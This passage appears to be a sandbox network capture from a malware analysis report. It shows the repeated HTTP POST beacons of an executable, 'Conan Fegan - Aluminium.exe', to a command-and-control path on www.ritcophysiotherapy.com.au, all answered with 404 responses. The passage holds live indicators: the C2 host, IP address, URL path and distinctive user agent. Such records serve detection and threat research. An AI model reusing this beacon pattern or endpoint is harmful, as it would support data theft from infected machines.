                                          Connection: close
                                          Feb 22, 2021 19:13:57.467051029 CET2594INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:57 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          42192.168.2.449811203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:58.050741911 CET5375OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:58.757900953 CET5451INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:58 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          43192.168.2.449812203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:59.321820021 CET5562OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:00.041541100 CET5787INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:59 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          44192.168.2.449813203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:00.631942034 CET6057OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:01.344598055 CET6194INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:01 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          45192.168.2.449814203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:01.922836065 CET6195OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:02.623399973 CET6196INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:02 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          46192.168.2.449815203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:03.230295897 CET6197OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:03.928021908 CET6198INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:03 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          47192.168.2.449816203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:04.508068085 CET6199OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:05.223133087 CET6199INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:05 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          48192.168.2.449817203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:05.814223051 CET6200OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:06.530955076 CET6201INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:06 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          49192.168.2.449818203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:07.112781048 CET6201OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:07.826639891 CET6202INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:07 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          5192.168.2.449752203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:09.379899025 CET1540OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:10.094573975 CET1541INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:09 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          50192.168.2.449819203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:08.413652897 CET6203OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:09.114203930 CET6204INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:08 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          51192.168.2.449820203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:09.712193966 CET6204OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:10.421947002 CET6205INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:10 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          52192.168.2.449821203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:11.002002954 CET6206OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:11.707024097 CET6207INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:11 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          53192.168.2.449822203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:12.313270092 CET6207OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:13.023763895 CET6208INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:12 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          54192.168.2.449823203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:13.908883095 CET6209OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:14.616005898 CET6209INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:14 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          55192.168.2.449824203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:15.437535048 CET6210OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:16.140294075 CET6211INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:16 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          56192.168.2.449825203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:16.710648060 CET6212OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:17.424968958 CET6212INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:17 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          57192.168.2.449826203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:18.024683952 CET6213OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:18.739638090 CET6214INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:18 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          58192.168.2.449827203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:19.321867943 CET6215OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:20.031702995 CET6215INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:19 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          59192.168.2.449828203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:20.599287033 CET6216OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:21.306483984 CET6217INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:21 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          6192.168.2.449753203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:13:10.753897905 CET1542OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:13:11.455200911 CET1542INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:11 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          60192.168.2.449829203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:21.882520914 CET6218OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:22.606409073 CET6218INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:22 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          61192.168.2.449830203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:23.176364899 CET6219OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:23.883021116 CET6220INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:23 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          62192.168.2.449831203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:24.482439995 CET6221OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:25.190963030 CET6221INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:25 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          63192.168.2.449832203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:25.733887911 CET6222OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:26.446412086 CET6223INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:26 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          64192.168.2.449833203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:27.016300917 CET6224OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:27.717015982 CET6224INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:27 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          65192.168.2.449834203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:28.298521042 CET6225OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:29.005323887 CET6226INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:28 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          66192.168.2.449835203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:29.542202950 CET6227OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:30.244988918 CET6235INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:30 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          67192.168.2.449837203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:30.810538054 CET6239OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:31.511131048 CET6240INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:31 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          68192.168.2.449839203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:32.137482882 CET6250OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:32.846445084 CET6251INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:32 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
